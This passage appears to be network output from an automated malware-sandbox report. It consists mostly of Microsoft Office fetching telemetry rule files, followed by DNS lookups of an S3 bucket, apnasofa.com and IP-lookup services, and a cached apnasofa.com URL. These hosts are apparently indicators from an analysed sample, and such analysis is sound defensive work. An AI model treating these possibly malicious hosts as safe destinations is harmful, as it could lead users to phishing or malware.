        Source: global trafficHTTP traffic detected: GET /rules/rule702650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule703101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule702901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule703601v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule703100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule702900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule703600v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule703801v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule703850v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule703800v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule703851v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule703701v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule703750v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule703751v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule701301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule703700v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule701300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule704051v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule701700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule701701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule704050v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule702051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule700701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule702050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule700700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule700551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule700550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule703651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule703650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule700601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule700600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule703151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule703150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule703950v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule703951v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule702851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule702850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule700000v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule700001v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule701401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule701400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule701951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule701950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule700851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule700850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule701850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule701851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule703051v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule703050v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule700101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule702101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule702100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule700100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule700951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule700950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule703551v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule703550v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule700451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule702701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule702700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule700450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule701901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule704001v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule701900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule704000v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule703251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule703250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule702401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule702400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule701551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule701550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule700301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule700300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule702001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule702000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule702600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule702601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule703201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule703200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule700251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule700250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule700651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule700650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule703301v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule703300v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule701751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule701750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule701651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule701650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule702451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule702450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule701101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule701100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120128v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120603v8s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule230104v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120607v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule230157v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule230158v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule230162v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule230164v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule230165v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule230166v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule230167v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule230168v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule230169v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule230170v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule230171v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule230172v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule230173v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule230174v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120119v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule224900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule704101v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule704100v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule704201v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficDNS traffic detected: DNS query: google.lk
        Source: global trafficDNS traffic detected: DNS query: www.google.lk
        Source: global trafficDNS traffic detected: DNS query: www.google.com
        Source: global trafficDNS traffic detected: DNS query: x1.i.lencr.org
        Source: global trafficDNS traffic detected: DNS query: i--iy.s3.us-east-1.amazonaws.com
        Source: global trafficDNS traffic detected: DNS query: apnasofa.com
        Source: global trafficDNS traffic detected: DNS query: api.ipify.org
        Source: global trafficDNS traffic detected: DNS query: ipwhois.app
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Tue, 03 Dec 2024 16:49:49 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
        Source: 77EC63BDA74BD0D0E0426DC8F80085060.1.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
        Source: 2D85F72862B55C4EADD9E66E06947F3D0.1.drString found in binary or memory: http://x1.i.lencr.org/
        Source: chromecache_181.5.drString found in binary or memory: https://apnasofa.com/episode/index#
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49865
